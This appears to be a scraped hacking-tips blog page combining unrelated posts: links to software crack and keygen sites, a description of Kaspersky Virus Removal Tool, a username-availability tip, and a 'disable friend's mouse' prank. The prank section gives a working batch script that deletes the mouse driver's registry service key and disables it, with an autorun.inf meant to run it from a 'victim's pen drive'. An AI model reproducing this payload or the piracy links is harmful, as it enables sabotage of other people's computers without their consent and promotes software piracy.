Serials And Craks

Top Sites To Find All The Serials and cracks

The list below gives you some really cool sites that can provide you with the cracks , serials , and keygens for any software you would ever need. We also have a list of Keygen And Patches Of 2011 which has a total of 306 keygens and patches alltogether.
2.     www.keygen.in
5.     www.zcrack.com
8.     supercracks.net

Kaspersky Virus Removal Tool
The Kaspersky Virus Removal Tool is a Freeware application designed to be another virus scanner and detection software from Kaspersky. The product will scan the specified locations for any virus threats and remove them. Kaspersky Virus Removal Tool 2010 does not provide resident protection for your computer. After disinfecting a computer, you are supposed to remove the tool and install a full version of antivirus software.


Kaspersky Virus Removal Tool does not have a function allowing to update its antivirus database. The only way to update its database is to download it again from Kaspersky Lab servers and install it. Take note that it is also necessary to uninstall older version of Kaspersky Virus Removal Tool 2010 before installing a newer one. After successful disinfection of a computer, it is recommended to uninstall Kaspersky Virus Removal Tool and install a fully-functional antivirus application.

Advantages:
  • Simplified interface.
  • Can be installed to an infected computer (Safe Mode supported).
  • Composite scan and disinfection system: signature detection and heuristic analyzer.
  • Gathering system information and interactive creation of scripts for disinfection.
General functions:
  • Automatic and manual removal of virus, Trojans and worms.
  • Automatic and manual removal of Spyware and Adware modules.
  • Automatic and manual removal of all types of rootkits.
Note that Kaspersky Virus Removal Tools is unsuitable for providing resident protection on computers.
The only function of the tool is scan-on-demand. It cannot work in real-time mode.

Caution: Your computer may crash to BSOD, hang, etc. in the result of simultaneous execution of more than one version of Kaspersky Virus Removal Tool 2010.

Latest Kaspersky Virus Removal Tool
Download Here




Check Username Availability 80 Websites

With wide explosion in the reach-ability of Internet, the numbers of user has increased exponentially and so the number of websites.If you are an Internet freak and has been already registered on popular website you might know how difficult it is to find a common username for all websites.You can find usernamea available in one website but on another it may be already taken.This results in remembering different usernames for different websites (or in making of a spreadsheet to keep record).

Now you can troubleshoot this problem by checking availability of username on most popular 80 websites simultaneously.
Steps..
1. Go to NameChk website.

2. In the text field type the username that you want to set and click on CHK button.

3. Now the list will be displayed on which site the username is available and taken.

This tool is very helpful for those who often make their accounts online for promoting their brand or website.

Trick to Disable Friend's Mouse















Step1: Copy the Batch code into notepad.


Save it as .bat extension (for eg: filename.bat)

NOTE: remove ";" at the end of each code n den save


@echo off
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass";
reg delete %key%;
reg add %key% /v Start /t REG_DWORD /d 4;



Step2: Now open the notepad and copy this code.

Save above code as "autorun.inf"

[autorun]
Open=filename.bat
Action=Mouse Disable


Step 3: Then copy the two files in your pen drive or victim's pen drive.


*How to recover from this attack?
Copy this code into the notepad.
and save it with .bat extension(for eg: filename.bat).

Now final step is to double click this batch file.

NOTE: remove ";" at the end of each code n den save


@echo off
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass";
reg delete %key%;
reg add %key% /v Start /t REG_DWORD /d 1;